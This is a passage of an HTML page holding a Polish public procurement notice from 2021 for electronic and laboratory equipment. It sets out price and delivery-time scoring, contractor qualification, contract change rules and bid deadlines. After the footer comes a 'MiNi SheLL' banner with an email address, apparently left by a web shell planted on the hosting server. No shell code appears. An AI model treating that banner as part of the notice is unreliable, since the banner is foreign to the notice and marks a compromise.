zasilające</p> <p class="mb-0">31682210-5 - Aparatura i sprzęt sterujący</p> <p class="mb-0">31700000-3 - Urządzenia elektroniczne, elektromechaniczne i elektrotechniczne</p> <p class="mb-0">38000000-5 - Sprzęt laboratoryjny, optyczny i precyzyjny (z wyjątkiem szklanego)</p> <p class="mb-0">38341300-0 - Przyrządy do mierzenia wielkości elektrycznych</p> <p class="mb-0">38342000-4 - Oscyloskopy</p> <p class="mb-0">38552000-9 - Mierniki elektroniczne</p> <p class="mb-0">38636100-3 - Lasery</p> <p class="mb-0">38900000-4 - Różne przyrządy do badań lub testowania</p> <p class="mb-0">42661100-8 - Urządzenia do lutowania na miękko</p> <p class="mb-0">44511000-5 - Narzędzia ręczne</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postepowania i spełniają warunki, o których mowa w art. 112 ust 2 Ustawy, dotyczące:1)	posiadania kompetencji lub uprawnień do wykonywania określonej działalności zawodowej, o ile to wynika z odrębnych przepisów,2)	sytuacji ekonomicznej i finansowej,3)	zdolności technicznej lub zawodowej,przy czym Zamawiający nie stawia szczegółowych warunków w tym zakresie i wymaga jedynie złożenia Oświadczenia Wykonawcy dotyczącego spełniania warunków udziału w postępowaniu (Załącznik nr 2 do Specyfikacji ),2.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 108 ust. 1 Ustawy.3.	Ponadto Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. – Prawo restrukturyzacyjne (t.j. Dz. U. z 2020 r. poz. 814 z późn. zm.). lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. – Prawo upadłościowe (Ustawa z dnia 28 lutego 2003 r. Prawo upadłościowe (t.j. Dz. U. z 2020 r. poz. 1228 z późn. zm.).;4.	Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku podmioty te ponoszą solidarną odpowiedzialność za wykonanie umowy. Ten sam Wykonawca może być członkiem tylko jednego konsorcjum.2.	Wykonawcy występujący wspólnie ustanawiają pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i do zawarcia umowy.3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą oryginału pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, Oświadczenie Wykonawcy dotyczące spełniania warunków udziału w postępowaniu (Załącznik nr 2 do Specyfikacji), i Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania (Załącznik nr 3 do Specyfikacji), składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej lub elektronicznej z podpisem kwalifikowanym pod rygorem nieważności i dopuszczalne są zgodnie z art. 455 ustawy Pzp w następujących przypadkach.1) Strony są uprawnione do dokonania zmian umowy o łącznej wartości mniejszej niż progi unijne oraz niższej niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy;2) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;3) zwłoki w realizacji umowy – w zakresie zmian terminów realizacji umowy, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu realizacji umowy, na warunkach określonych w § 2 ust. 5 umowy i następne; powyższa zmiana nie wyłącza możliwości naliczenia kar umownych zgodnie z § 9 umowy;4) w sytuacji ujawnienia się powszechnie występujących wad oferowanego sprzętu lub oprogramowania Zamawiający dopuszcza zmianę w zakresie przedmiotu umowy polegającą na zastąpieniu danego produktu produktem zastępczym, spełniającym wszelkie wymagania przewidziane w sws dla produktu zastępowanego, rekomendowanym przez producenta lub wykonawcę w związku z ujawnieniem wad;5) w przypadku gdy zmiana nie prowadzi do zmiany charakteru umowy i zostały spełnione łącznie następujące warunki: a) konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością nie mógł przewidzieć; b) wartość zmiany nie przekracza 50 % wartości zamówienia określonej pierwotnie w umowie. 6) w przypadkach zmian uznanych za nieistotne, w szczególności: a) wystąpienie omyłek pisarskich i rachunkowych; b) zmiany formy organizacyjnej Wykonawcy; c) zmiany personalne oraz osób nadzorujących wykonanie przedmiotu umowy; d) zmiany obowiązujących przepisów prawa; e) inne, które nie będą w sposób istotny ingerować w przedmiot umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-19 15:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Agencja Rozwoju Regionalnego S.A. w Łomży, ul. M.C. Skłodowskiej 1, 18-400 Łomża</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-20 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-31 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com